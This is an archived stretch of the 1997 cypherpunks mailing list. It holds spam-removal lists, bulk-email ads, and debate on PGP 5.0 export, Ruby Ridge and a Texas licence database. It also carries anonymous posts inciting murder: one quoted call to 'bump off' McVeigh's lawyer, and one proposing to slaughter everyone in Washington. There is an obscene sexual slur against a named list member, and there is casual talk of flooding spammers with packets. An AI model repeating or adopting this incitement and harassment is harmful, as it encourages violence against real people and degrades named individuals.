and/or an ad for a sex site. I'll tell you what I did, if anyone cares to spend a little time emulating what I did. Visit these two sites and jump through the loops: http://www.thehitman.com/ http://www.iemmc.org/validate.html (You may also want to check out these Web sites: http://drsvcs.com/nospam/ http://pages.ripco.com:8080/~glr/nojunk.html ) Send an e-mail with a "remove" in the subject to the following collection of addresses. I keep track of when I send in a semi-automatic ";remove" request. Quite a few of them keep on sending junk e-mail despite the remove requests. Some may add you to their junk mail list when they get your remove request if you're not on it already. 1health at zeecom.com 1stfam at regulus.net access at 1stfamily.com access at 1stfamily.com addresses at answerme.com admin at t-3net.com alpha1 at delapaz.com askme at homepowerbiz.com babbling2 at answerme.com babbling at answerme.com ballman at t-1net.com bannonj at mail.albany.net bannonj at ofns.com billm at ascella.net bizman at savetrees.com bizop at zignzag.com bld892 at hotmail.com bowdie at regulus.net campaign at arialsoftware.com canceranswer at eom.net carproinc at savetrees.com cleanair at spica.net clubmail at com3xbz.riser.net clubmail at net5xai.riser.net credit2u at savetrees.com ctn at cartridgetechnology.com cyber at cura.net cyber at netlane.com dayton at onramp.net desp at answerme.com details1 at savetrees.com dlsnet at savetrees.com editors at commonwealthpub.com enjoylife7 at savetrees.com ernie at mlmail.com feedback at amazon.com feedback at fawcette.com fundsrecovery at savetrees.com future at successmail.com genesis at savetrees.com globalnet8 at savetrees.com grow at savetrees.com heavensgate777 at hotmail.com help at microsmarts.com help at savetrees.com hitinfo at rapidconnect.com hj11 at tellthem.com htmp at rapidconnect.com iconsult at cyberpromo.com ims at cyberpromo.com imsco at cyberpromo.com incomeonline at nevwest.com info at spec-fx.com info at tsf-industries.com jimjohn12 at workload.com josplace at lostvegas.com jrosato at ascella.net lninfo at savetrees.com lvc at lvcpub.com macs at answerme.com macsvc at ix.netcom.com mail at global-stock-exchange.com mail at mailermachine.com mailbox at alaska-marketplace.com mailer at mail.nettwerks.com mailme at ieighty.net mas-remove at nelsonpubl.com maximum at savetrees.com mdbiz at nevwest.com megamoneymakers at mail-response.com microcap at lostvegas.com mm_mail at mailermachine.com mnoffice at t-3net.com mxzr2 at savetrees.com nancy at ginette.com netmoney at lostvegas.com netpower at answerme.com nhbb at t-1net.com no-news at amazon.com offshorecard at answerme.com outofhere at answerme.com owl at owlsnest.com pandrews at sc1.kintyre.com pctraining at savetrees.com pctraining at t-1net.com phoenix at workload.com picks at webersmall.com pls at savetrees.com pluto at nevwest.com pnpservices at t-1net.com postmaster at ascella.net postmaster at nim.com powertools at cybertools.net putpeel at putpeel.com reindex at aol.com remmee at answerme.com remove11 at answerme.com remove1 at answerme.com remove2 at answerme.com remove3 at answerme.com remove3 at juno.com remove4 at answerme.com remove5 at answerme.com remove6 at answerme.com remove7 at answerme.com remove8 at answerme.com remove at best-prices.com remove at cyberbundle.net remove at cyberpromo.com remove at eb.com remove at econopromo.com remove at endlesssuccess.com remove at first-star.com remove at gw.mailmaster.com remove at hydrix.com remove at i-machine.com remove at iemmc.org remove at looplink.com remove at mailout.com remove at mkt-america.com remove at mkt-usa.com remove at mortgagemgr.com remove at mortgagemgr.com remove at net-wwworth.com remove at newsyoucanuse.com remove at ngmgold.com remove at nim.com remove at qlink2info.com remove at quantcom.com remove at regulus.net remove at remove-me.com remove at worldwidepromo.com removeit at mkt-america.com removemenow at answerme.com removemenow at cyberpromo.com reply15 at answerme.com root at mail.internorth.com roys at wt.net sales at e-distributors.com sales at scarlett.org sandy at inneraction.com secsys at 1stfamily.com serenityinfo at savetrees.com service at ibase.net simrem at answerme.com skifast1 at earthlink.net slender at juice4u.net smartbiz at nevwest.com solgroup at vii.com sonnyv at webspawner.com specialofffer at glenfinnan.com stealth at glenfinnan.com stephanie at pacific-publishing.com t3 at t3-com.com takemeoff at answerme.com teambuilder at mail-response.com techkids at prolinx.net theadd at answerme.com tjordan at savetrees.com tnt-remove at eom.net tnt-remove at eom.net toner-girl at ctynet.com tony at answerme.com user2361 at servmail.com virtualone at mynumber.com vision1 at regulus.net vision2 at regulus.net vision3 at regulus.net vision4 at regulus.net vision5 at regulus.net vision6 at regulus.net vision7 at regulus.net vision8 at regulus.net vmailone at mail89.com wcorp at netfiber.com webmaster at mailloop.com websales at akyp.com welcome at webersmall.com wss at wallstreetsports.com zvi at creditnet.com --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From enoch at zipcon.net Sat Aug 16 16:31:03 1997 From: enoch at zipcon.net (Mike Duvos) Date: Sun, 17 Aug 1997 07:31:03 +0800 Subject: Picketing With Packets In-Reply-To: Message-ID: <19970816232134.20321.qmail@zipcon.net> dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes: > In all fairness, in addition to Stanford Wallace, there are > several other spammers sending out junk e-mail. If you > completely eliminate Stanford and his company, you will > STILL get junk e-mail. If Mr. Spamford were terminated with extreme prejudice, my junk email would be reduced to managable levels. > Perhaps this will spark another round of a cypherpunk > discussion of technical solutions to junk e-mail... I'm tempted to go some sort of postage route myself, but I occasionally get mail from newbies who have never written me before, and who occasionally have something interesting to say. > I placed myself on a zillion "remove" lists. Now I no > longer get any junk e-mail of interest (which I did on rare > occasions), but still get at least once a day an MMF and/or > an ad for a sex site. > I'll tell you what I did, if anyone cares to spend a little > time emulating what I did. > Visit these two sites and jump through the loops: It is not *I* who should do the hoop-jumping in order to keep my mailbox free of garbage. > Send an e-mail with a "remove" in the subject to the > following collection of addresses. I keep track of when I > send in a semi-automatic ";remove" request. Quite a few of > them keep on sending junk e-mail despite the remove > requests. Some may add you to their junk mail list when they > get your remove request if you're not on it already. Again, I will forward *ALL* my email to /dev/null before I kowtow before some humongous list of offenders. [Very Long List Snipped] Additionally, a lot of mail is of the "This is the only mailing you will receive from us" variety. Getting 50 a day of those can be royally annoying as well. I am tempted to launch a few thousand packets in the direction of any IP which sends me unwanted material trying to sell me something. If everyone did this, spamming machines would be buried in a packet snowstorm within a few minutes of starting operations. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From helledge at oilfieldtrash.com Sun Aug 17 07:39:40 1997 From: helledge at oilfieldtrash.com (helledge at oilfieldtrash.com) Date: Sun, 17 Aug 1997 07:39:40 -0700 (PDT) Subject: Reduce your long distance bills Message-ID: <199708171439.HAA14839@toad.com> /////////////////////////////////////////////////////////////////////////////// This Message was Composed using Extractor Pro Bulk E- Mail Software. If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" and this software will automatically block you from their future mailings. //////////////////////////////////////////////////////////////////////////////// True Residual Income-FCI Communications Hello there, Every day I check my mail, I get another solicitation from one of those 5.9 or 7.9 cent per minute scams. In fact, I am also getting faxes a couple times per week by the same or similar groups. They always ask for a sign up fee of anywhere from $29.95 to $100 or more; $50 is the most common. These con artists are coming and going every week now, some undoubtedly collecting $1000's in up front fees for the right to promote a non-existent service for a non-existent commission. I'm writing this message to you in an effort to spread the truth about these fraudulent scam artists. I am a 60 year old, practicing international petroleum engineer and I supplement my income by working in the telecommunications industry. I have traveled to 58 countries and therefore have paid my share of high long distance calls. I have been around the block more than a few times, and I can tell you this: The best deal any average consumer is going to get in this country today is a 9.9 cent per minute flat rate, if you know where to go. Here is the reason why: Whenever a long distance call is placed, there are fees charged by your local telephone company, called "origination" fees, and fees charged by the receiver a local telephone company, called "landing" fees. These fees are regulated by the federal government. On average, the combined origination/landing fees are 6.5 to 7.5 cents per minute, depending on the telephone companies involved. In addition to those fees, the carrier that connects the call over long distances via fiber, copper, and/or satellite links carries a cost for that call of at least 1 cent, and sometimes more. This brings the COST for that call to 7.5 to 8.5 cents per minute. Then, there are the administrative costs associated with the calls in the form of "rating" the call data, "formatting" the calls in a logical manner to present them to the consumer (both processes are extremely computer intensive , AND postage, paper, and labor, in the form of customer service, and equipment maintenance. Conservatively, these costs add another .5 (one half) cent, bringing the true COST of a long distance telephone call to anywhere from 8 to 9 cents per minute. Finally, there is the cost of distribution, i.e.: marketing and advertising. The commercials that you see on television every day for the big carriers are not free to those companies. In fact, they spend millions of dollars every DAY to push their long distance service, which, remember, is costing THEM 8 to 9 cents per minute. When you see a commercial for Sprint, for example, make sure you watch the fine print. Their "dime line" only applies during evenings after 7pm, and during the weekend. Every weekday from 7am to 7pm the cost is 25 cents per minute. AT&T has taken a more honest approach recently with their "one rate", yet even they are still charging 15 cents per minute. MCI has so many plans now, you're lucky if you'll ever know how much you're paying for a long distance call until you look at your bill. (if you dare) Telecommunications "resellers" are the real wave of the future. These companies purchase transmission time from major carriers, and bill their customers themselves, while still providing the exact same service at a much lower cost. Their customers are still physically utilizing the major carriers for service, but simply receive their BILLS for their calls from the reseller or "rebiller". Since deregulation in 1984, the reseller industry has grown to over $12 BILLION per year, and industry experts predict that by the year 2000, the majority of telecommunications usage will be handled by resellers utilizing the major carriers. How can they do this? By being creative in their marketing approach, and keeping the cost of distribution down to an absolute minimum. The most cost-efficient way to market telecommunications is via an agent network, i.e.: individuals working for the reseller on a commission-only basis. The best rate any individual can receive today is through a reseller for a major carrier. I am a customer and agent for a company called FCI, which is a direct reseller for IXC Communications, Inc., the USA's 5th largest coast-to-coast fiber optic network. IXC currently provides 1000's of miles of fiber for AT&T, Sprint, MCI, and the federal government. FCI offers a flat rate 9.9 cent per minute rate for 1+ long distance AND 800 usage, and bills its customers in 6 second increments, instead of full minute increments like the big carriers do. This results in savings to consumers of an additional 10%-25%, depending on the types of calls placed. FCI is also nearly finished completing a "web page billing" system which will be a great benefit to the consumer, as they will be able to see the actual calls they place on a DAILY basis, as well as their cost for those calls. When in place, FCI will be the ONLY long distance company in the nation offering this unique service. The Wall Street journal, as well as the FOX News Channel, have recently featured FCI and their unique approach to the long distance market. FCI is a truly revolutionary company, and has been gaining acclaim across the nation and particularly on the internet. As a reseller, FCI has the right to work with other carriers if they are presented with better rates for their customers. FCI has recently chosen to work with ITL (International Telecom Ltd) for its superior international calling rates, such as the following flat rates per minute (US origination): U K .185 Russia .670 France .280 Greece .475 Israel .690 Japan .360 (this is not a typo!) China .810 For more information on FCI and how you can even earn a great residual income by promoting their service like I do, you may visit my FCI Web Page at: http://freedomstarr.com/?EL3544771. You will have the opportunity to sign up for service online, and get a free web page to promote the service, with an opportunity to earn up to 5% residual commissions on other people's usage. There is no "sign up" or "agent" fee to participate in the program. I hope this note finds you and yours in good health. Good luck and warm regards, Harold W. Elledge From wombat at mcfeely.bsfs.org Sat Aug 16 20:33:03 1997 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sun, 17 Aug 1997 11:33:03 +0800 Subject: FCPUNX:McVeigh on McVeigh In-Reply-To: <199708161327.IAA18154@dfw-ix3.ix.netcom.com> Message-ID: > McVeigh's conviction was a given, no matter how skilled an attorney > he had representing him. That's how it works at that level. Given that he appears to have actually been guilty, and was not tried in California, perhaps he would have been convivted regardless of how much was spent on his defense. The O.J. trial should not be used as a legal standard; it was a media event, not a trial, with book deals for winners and losers alike. From nobody at REPLAY.COM Sat Aug 16 21:10:48 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Aug 1997 12:10:48 +0800 Subject: Remailer hating Nazis In-Reply-To: Message-ID: <199708170347.FAA28985@basement.replay.com> > If anything, flaming anonymously is good, since you can say anything you > damn well please without a care. There are lots of good reasons to use remailers, but thinking that you are not responsible for your actions is not one of them. Anything you send may be around to haunt you for many years to come. If you believe that any computer sytem is foolproof... you have a lot to learn. There is always a possibility that people will found out your real identity and where you live, through a human error or a flaw in the remailer. (Right, toto?). > It relieves stress. There are easier and safer ways: get some exercise, or check out a porno site, or go to a rifle range, or write a reply but don't send it. ::Boots Greets to all my friends in domestic surveilance. From Abstruse at technologist.com Sat Aug 16 21:59:22 1997 From: Abstruse at technologist.com (Abstruse) Date: Sun, 17 Aug 1997 12:59:22 +0800 Subject: Just in case... Message-ID: <33F67EE5.5760@technologist.com> ok..i don't know how many of you saw this, and..given my short time recently, it may have even passed through this list..so, if it's a re-post, i apologive..if not, enjoy..but i figure with all the other side threads that come through here..this will be my fuck up if it's a re-post, ok?! well, enough of that, onto the post! ***************************from the BoS list****************** In a development that is probably sending Louis Freeh into coniptions and may represent a fatal blow to the administration's efforts to control encryption exports, the source code for Pretty Good Privacy's PGP 5.0 encryption program was posted Monday on a web site at the University of Oslo. So how did it get there, what with prohibitions on the export of 128-bit encryption encryption software? Right out the front door, that's how -- in the form of a 6,000-page book (remember them?), a format that is not covered by the law. A group of enterprising hackers set about scanning all 6,000 pages of the source code and then painstakingly double-checked for errors, a two-month process whose final fruits were unveiled in Unix format Monday, with Mac and Windows versions forthcoming. PGP says it had nothing to do with the whole thing, but was happy to have its product vetted free by a group of experts, whose trouble-shooting showed that the code is secure and contains no back doors for government visitors. More info at http://www5.zdnet.com/zdnn/content/zdnn/0812/zdnn0006.html From frissell at panix.com Sat Aug 16 22:13:21 1997 From: frissell at panix.com (Duncan Frissell) Date: Sun, 17 Aug 1997 13:13:21 +0800 Subject: (Fwd) FWD: Texas Driver's License database on the web In-Reply-To: <199706111929.MAA04945@toad.com> Message-ID: <3.0.1.32.19970616231344.006959d8@panix.com> >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >From: Brent Heustess > > This is a really spooky web site . You can >search 17 million Texas drivers by name, driver's license number or >license plate number. When you find a person, you can then find everyone >at that address with a license. You can even find everyone with the same >9-digit zip code. The record does not have a GIF of the photo, but it >has everything else on the license. Those who tell the government the actual address where they sleep at night have no expectation of privacy. Most governments don't care if you substitute an accomodation address. If you find a government that does care, shop around until you find another that doesn't. I've been turned down exactly once in my career when I attempted to use an accomodation address for DMV purposes. I went elsewhere. DCF From nobody at REPLAY.COM Sat Aug 16 23:33:35 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Aug 1997 14:33:35 +0800 Subject: Degausser Message-ID: <199708170622.IAA14546@basement.replay.com> Tim C[reep] Mayflower will fuck anything that moves, but he'd rather be fucking his own mother's dead body. __o _ \<_ Tim C[reep] Mayflower (_)/(_) From snow at smoke.suba.com Sat Aug 16 23:38:14 1997 From: snow at smoke.suba.com (snow) Date: Sun, 17 Aug 1997 14:38:14 +0800 Subject: Reducing Crypto-Anonymous Crime by 50% / Re: Getting ecash without an MTB account In-Reply-To: <199708160015.TAA10733@dfw-ix9.ix.netcom.com> Message-ID: On Fri, 15 Aug 1997, Neva Remailer wrote: > An analysis of the cypherpunks list archives shows that most of > the undesirable activities being perpetrated in the crypto-anonymity > arena are the result of a conspiracy between Alice, Bob, and their > shady friends. That would be Alice Donut, and Bob Dobbs. Petro, Christopher C. snow at smoke.suba.com From dformosa at st.nepean.uws.edu.au Sat Aug 16 23:38:48 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Sun, 17 Aug 1997 14:38:48 +0800 Subject: Remailer hating Nazis In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 15 Aug 1997, Anonymous wrote: > If anything, flaming Anonymously is good, since you can say anything you > damn well please without a care. I think this says alot more about you Mr Anomymous then it dose about the use of Anonymous servers. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM/YhpKQK0ynCmdStAQEKAgQAsLrDcVpTyY8Zkr287BbiGSgTm4u4zyCg erTceiR1imaJ7shYP5qZDSTnxMvaS/OiFG99JeYRy7Fp38zfOob6+5x4E2gvU9HU hqKj3aX2ohIVgljbJg8sHEyUUNT0Gkt3uVv616T+l0+sZqrgJcQYkP2Bb5gmWglG viNOTxmtLMM= =s63B -----END PGP SIGNATURE----- From ezx45542 at cttl.net Sun Aug 17 15:06:45 1997 From: ezx45542 at cttl.net (ezx45542 at cttl.net) Date: Sun, 17 Aug 1997 15:06:45 -0700 (PDT) Subject: HI THERE Message-ID: <123456789kv1234@mirc.com> Are you looking for a low cost advertising tool to reach out to MILLIONS of potential customers? Bulk E-mail is the ad tool of the 21st century. Its quick, easy, and inexpensive. Bulk E-mail makes it possible for even a small business to compete on the world market. Imagine getting your message out to a million people in a single day, and at a cost less than the price of a newspaper ad that may only reach a few thousand. The best part is, we do the work for you. Simply fill out the order form below, and mail it to us, and we take care of the rest. We will even mail/e-mail a report to you on how many, and to which domains your mail was sent. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ORDER FORM: (if you don't have a printer, simply copy the necessary information on a blank paper.) Quantity to be e-mailed: _______X 100,000 @ $20.00 ea..........___________ _______X 1,000,000 @ $150.00 ea.......___________ 10,000,000 @ $750.00................... ___________ Total Order...........................................................$____________ Mail check or money order to: KVC Marketing 5120 Overland Rd suite c-206 Boise, Id 83705 Credit Card orders: Name on card____________________________________ Account number_________________________________ Expiration Date______________ Authorized Signature______________________________ Send Bulk Mail confirmation? No_____ Yes____ To: either E-mail Address ____________ at _______________ Or to: Name _________________________________ Address__________________________________ City_______________St_______Zip____________ ----------------------------------------------------------------------------------------------------------------------------------- Desired Text: _________________________________________________________________ _________________________________________________________________ _________________________________________________________________ _________________________________________________________________ _________________________________________________________________ _________________________________________________________________ _________________________________________________________________ _________________________________________________________________ If specific domains are preferred, enter choices below. (i.e. aol.com, juno.com, etc) _________________________________________________________________ If you would like a clickable link to your website, enter URL here: http://____________________________________________________________ From miner333 at dogbert.xroads.com Sun Aug 17 00:06:47 1997 From: miner333 at dogbert.xroads.com (miner) Date: Sun, 17 Aug 1997 15:06:47 +0800 Subject: (Fwd) FWD: Texas Driver's License database on the web Message-ID: >>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >>From: Brent Heustess >> >> This is a really spooky web site . You can >>search 17 million Texas drivers by name, driver's license number or >>license plate number. When you find a person, you can then find everyone >>at that address with a license. You can even find everyone with the same >>9-digit zip code. The record does not have a GIF of the photo, but it >>has everything else on the license. > >Those who tell the government the actual address where they sleep at night >have no expectation of privacy. Most governments don't care if you >substitute an accomodation address. If you find a government that does >care, shop around until you find another that doesn't. I've been turned >down exactly once in my career when I attempted to use an accomodation >address for DMV purposes. I went elsewhere. > >DCF > There was an article in the WSJ about this recently, TX has passed a law that goes into effect Sept. 1ST that will make publiclink illegal, they said they would continue to run the site and see what happens in court. Don't remember the date of the article. From nobody at REPLAY.COM Sun Aug 17 00:14:28 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Aug 1997 15:14:28 +0800 Subject: Suitable for viewing by "Foals" (as rated by Tim C. May) Message-ID: <199708170705.JAA19084@basement.replay.com> * Paul Millhouse, 49, pleaded not guilty in February to assault on an animal after he was arrested in Lakeside, Calif., near San Diego. He is suspected of being the man sought for 11 years for various horse stalkings (the very first one of which was reported to police by Joan Embery, the San Diego Zoo spokesperson who frequently appeared on The Tonight Show Starring Johnny Carson). According to police in the latest incident, Millhouse was videotaped entering a private pasture, taking off his clothes, and fondling a horse. From nobody at REPLAY.COM Sun Aug 17 00:15:49 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Aug 1997 15:15:49 +0800 Subject: Shakespearean Conspiracy / Re: FCPUNX:McVeigh on McVeigh Message-ID: <199708170703.JAA18919@basement.replay.com> Wazoo MixMaster wrote: > At 06:27 PM 8/15/97 -0800, you wrote: > >For fifteen million dollars, McVeigh's lawyer couldn't be troubled to > >raise his voice in his client's defense. > > McVeigh's trial wasn't about truth or justice. It was all about getting revenge, > drawing blood, satisfying the bloodthirsty people of America. > > this government controlled dickless loser that was McVeighs lawyer, > didn't prosecute like a man, because then he'd be blacklisted and treated like shit. > > If anyone out in this world feels like bumping off McVeighs lawyer, > please do so. We need less lawyers like him. Keep in mind that you should first remove all works of Shakespeare from your possession, since possession of them could lead to the filing of conspiracy charges against you. It might also draw the cypherpunks into the web of conspiracy from the point of view of the broad, unconstitutional laws covering this area, since Shakespeare was a cypher-punster. (I hope no one on the list has been exporting the works of Shakespeare without an export license.) BardMonger From nobody at REPLAY.COM Sun Aug 17 00:18:19 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Aug 1997 15:18:19 +0800 Subject: ASSETS FORFEITURE BILL ON THE MOVE Message-ID: <199708170707.JAA19317@basement.replay.com> To: remailer at REPLAY.CO From: CypherPisser X-Mailer: WinSock Remailer Version ALPHA1.3B X-Comments: - X-Comments: "I am not an asshole, but I play one in real life." X-Comments: - X-Comments: "If you can't say something nice about someone... X-Comments: ...piss on 'em." X-Comments: - X-Comments: This message is NOT from CypherPisser. X-Comments: It was sent by an automated anonymous asshole under the X-Comments: auspices of the Electronic Forgery Foundation. X-Comments: - X-Comments: Note: Send any complaints about abuse of this remailer X-Comments: to the person most concerned about your rights and X-Comments: freedoms. (Hint: It's a "mirror" site.) X-Comments: - X-Remailer-Setup: Maximum Message Size -- None X-Remailer-Setup: Reordering is OFF X-Remailer-Setup: News Posting DISABLED X-Remailer-Setup: Subject Header KEPT X-Remailer-Setup: Logging COMPLETE Messages X-Remailer-Setup: PGP and plaintext messages accepted Subject: Re: ASSETS FORFEITURE BILL ON THE MOVE ;: Anon-To: cypherpunks at toad.com Robert Hettinga wrote: > From: Vinnie Moscaritolo > ASSETS FORFEITURE BILL ON THE MOVE > > At press time, the U.S. House Judiciary Committee had passed > H.R. 1965 -- an assets forfeiture bill. This legislation contains > provisions that would allow the Clinton-Gore Administration to > seize the assets of virtually any business on any pretext -- > including firearms-related businesses! Even if the warrant for > the original seizure is struck down, the government would then be > given additional time and "discovery" to examine the business > records to try and build a case to continue holding the assets > (read: firearms). Virtually any business that has any substantive > inventory and that is extensively regulated by the government is > in danger of having its goods seized -- even for non-criminal > regulatory infractions. H.R. 1965 is a Clinton-Reno scheme -- and > a civil rights nightmare -- and we strongly believe it will be > used as a tool against gun stores, collectors, or anyone else who > has a firearms collection or inventory worth stealing. Is it time to kill these fuckers, yet? Does anybody know what the secret signal is for us to descend on D.C. en masse and slaughter every living soul in the defense of freedom? (or merely on a whim?) Is the 'secret signal' when the sun comes up in the morning? That works for me! Uuhhh...Anonymous From nobody at REPLAY.COM Sun Aug 17 00:19:03 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Aug 1997 15:19:03 +0800 Subject: Vote 'Till It Hurts! Message-ID: <199708170705.JAA19203@basement.replay.com> WEIRDNUZ.491 (News of the Weird, July 4, 1997) by Chuck Shepherd * Lewis Ecker II, a diagnosed sexual sadist, was turned down in his release bid from St. Elizabeth's Hospital in Washington, D. C., in December even though he has made considerable improvement during his stay, even winning elective office in D. C. in 1990 (and being re-elected twice since) as an Advisory Neighborhood Commissioner. However, according to hospital officials, Ecker hurt his chances of release by secretly composing 21 sexual-sadist narratives (discovered in a search of the office he had been given the privilege of using) that featured himself as the protagonist who humiliated and injured female victims. From dlv at bwalk.dm.com Sun Aug 17 00:49:56 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 17 Aug 1997 15:49:56 +0800 Subject: Picketing With Packets In-Reply-To: <19970816232134.20321.qmail@zipcon.net> Message-ID: <55JkBe2w165w@bwalk.dm.com> Mike Duvos writes: > dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes: > > > In all fairness, in addition to Stanford Wallace, there are > > several other spammers sending out junk e-mail. If you > > completely eliminate Stanford and his company, you will > > STILL get junk e-mail. > > If Mr. Spamford were terminated with extreme prejudice, my junk > email would be reduced to managable levels. Perhaps because others like him would be scared... Most of the shit I get is from other spammers. > > Perhaps this will spark another round of a cypherpunk > > discussion of technical solutions to junk e-mail... > > I'm tempted to go some sort of postage route myself, but I > occasionally get mail from newbies who have never written me > before, and who occasionally have something interesting to say. How about this: have a program keep a list of the message-ids of all the articles you send to Usenet or via e-mail for a week. if someone sends you an e-mail with "In-Reply-to" message-id on the list, consider reading it. Otherwise if it's from a stranger, e-mail back explaining your filtering policy, and remember the message-id, so this time they can respond. > > I placed myself on a zillion "remove" lists. Now I no > > longer get any junk e-mail of interest (which I did on rare > > occasions), but still get at least once a day an MMF and/or > > an ad for a sex site. > > > I'll tell you what I did, if anyone cares to spend a little > > time emulating what I did. > > > Visit these two sites and jump through the loops: > > It is not *I* who should do the hoop-jumping in order to keep my > mailbox free of garbage. Here's a little crypto project: When you go to the iemmc.org site and enter your userid in a form, it e-mails back to you a number. You're supposed to retrive your e-mail, then go to another iemmc.org site and again type in your address and the number, and then you'll be removed from their junk mail list... yeah, right. Another dirty trick on iemmc.org's part is that if you're junking all e-mail from them, you can't get their number and can't complete their removal process (not that it helps much). Observation 1: it's much easier to get ON their junk mail list then to get OFF of it. Observation 2: if you enter the same userid several times, you get several different numbers in the mail; all of them work (not just the latest) Observation 3: a number that works with one address won't work with another address. It looks like the magic number has some random part and a checksum of the e-mail address you're trying to remove. It would embarrass them if we had a way of generating the numbers than their cgi script accepts. (Alternatively, maybe someone can pull out the source to their cg script...) Then people would be able to get themselves on the "remove" list much easier. > Additionally, a lot of mail is of the "This is the only mailing > you will receive from us" variety. Getting 50 a day of those can > be royally annoying as well. > > I am tempted to launch a few thousand packets in the direction of > any IP which sends me unwanted material trying to sell me > something. If everyone did this, spamming machines would be > buried in a packet snowstorm within a few minutes of starting > operations. Or they'll develop new techniques to combat such DOS attacks that'll benefit us all. :-) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From anon at anon.efga.org Sun Aug 17 01:34:48 1997 From: anon at anon.efga.org (Anonymous) Date: Sun, 17 Aug 1997 16:34:48 +0800 Subject: No charges for Ruby Ridge murderers Message-ID: At 06:30 PM 8/15/97 +0200, nobody at replay.com (Anonymous) wrote: > The Justice Department decided not to bring charges against former >FBI Deputy Director Larry Potts or Danny Coulson, Potts' deputy during the >1992 seige at the remote cabin of white supremacist Randy Weaver, said >government officials who spoke on condition of anonymity. Randy Weaver was a white SEPARATIST, not a white supremacist. The media is somehow capable of getting the separatist vs. supremacist when it comes to Louis Farrakhan, but not for Randy Weaver. Randy may well be, privately, a white supremacist. I think it's very likely, and even more likely that Farrakhan is a black supremacist, but no media person has ever pointed to a statement suppporting white SUPREMACY, as opposed to separation, by Weaver. They continue in their leftwing racist lies because they are biased, as a whole, against "evil" white males. Sad that they can't use truth as a standard instead of lies, since the truth is bad enough. ... > The department said in a statement obtained by The Associated >Press, "The available evidence does not support further criminal >prosecution of FBI officials ... from the August 1992 incident at Ruby >Ridge." The available evidence did, however, support a multimillion dollar verdict for Weaver. Sometimes, it's so wonderful being a taxpayer I have to break down and cry... Themediaislefty-racistmonger From cComplainer at hotmail.com Sun Aug 17 05:09:34 1997 From: cComplainer at hotmail.com (cComplainer at hotmail.com) Date: Sun, 17 Aug 1997 20:09:34 +0800 Subject: go ahead, be a Man Message-ID: <199708171505.PAA27829@server.imsday.com> Man invented language to satisfy his deep need to complain. -- Lily Tomlin From digital_matrix at hotmail.com Sun Aug 17 05:49:29 1997 From: digital_matrix at hotmail.com (David Downey) Date: Sun, 17 Aug 1997 20:49:29 +0800 Subject: PGP5i supports RSA keys? Message-ID: <19970817123643.13713.qmail@hotmail.com> >As PGP5i will be outside RSA's patent reach (i.e. the patent is only >valid within the US) will PGP5i support RSA keys? > Yes, PGP 5.0i does support the RSALIB. Even though you can generate RSALIB based keys, why do so when there is a newer and better algorythm supplied with the 5.0? Albiet it is nice to have the support as not everyone has converted over, I still prefer the newer one. 4096 bit keys are going to be rather hard to break in this lifetime. :-) ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From digital_matrix at hotmail.com Sun Aug 17 05:52:46 1997 From: digital_matrix at hotmail.com (David Downey) Date: Sun, 17 Aug 1997 20:52:46 +0800 Subject: Missed a PGP version? Message-ID: <199708171239.FAA05942@f31.hotmail.com> The version numbers of PGP floated from PGP 2.63i to PGP 5.0i. Did I miss a version or was this done to reflect the start of the break from the RSALIB algorythm? Also, does PGP 5.0 still support the MPLIB? Was it used in it's design? ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From whgiii at amaranth.com Sun Aug 17 06:25:55 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Sun, 17 Aug 1997 21:25:55 +0800 Subject: (Fwd) FWD: Texas Driver's License database on the web In-Reply-To: <3.0.1.32.19970616231344.006959d8@panix.com> Message-ID: <199708171312.IAA05620@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <3.0.1.32.19970616231344.006959d8 at panix.com>, on 06/16/97 at 11:13 PM, Duncan Frissell said: >Those who tell the government the actual address where they sleep at >night have no expectation of privacy. Most governments don't care if you >substitute an accomodation address. If you find a government that does >care, shop around until you find another that doesn't. I've been turned >down exactly once in my career when I attempted to use an accomodation >address for DMV purposes. I went elsewhere. I have allways prefered to have any government registrations done in a state that I *do not* reside in. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBM/brIY9Co1n+aLhhAQFjmwP/S3G3b5chD5aHOqRKSIbujz6vO+Wd53mC PW9nHu0jXn5sL0J7VLvG4/jyeYP8WMHVTBXaq3vACuNk+nqmUfv86X3f7tp9Ycf/ 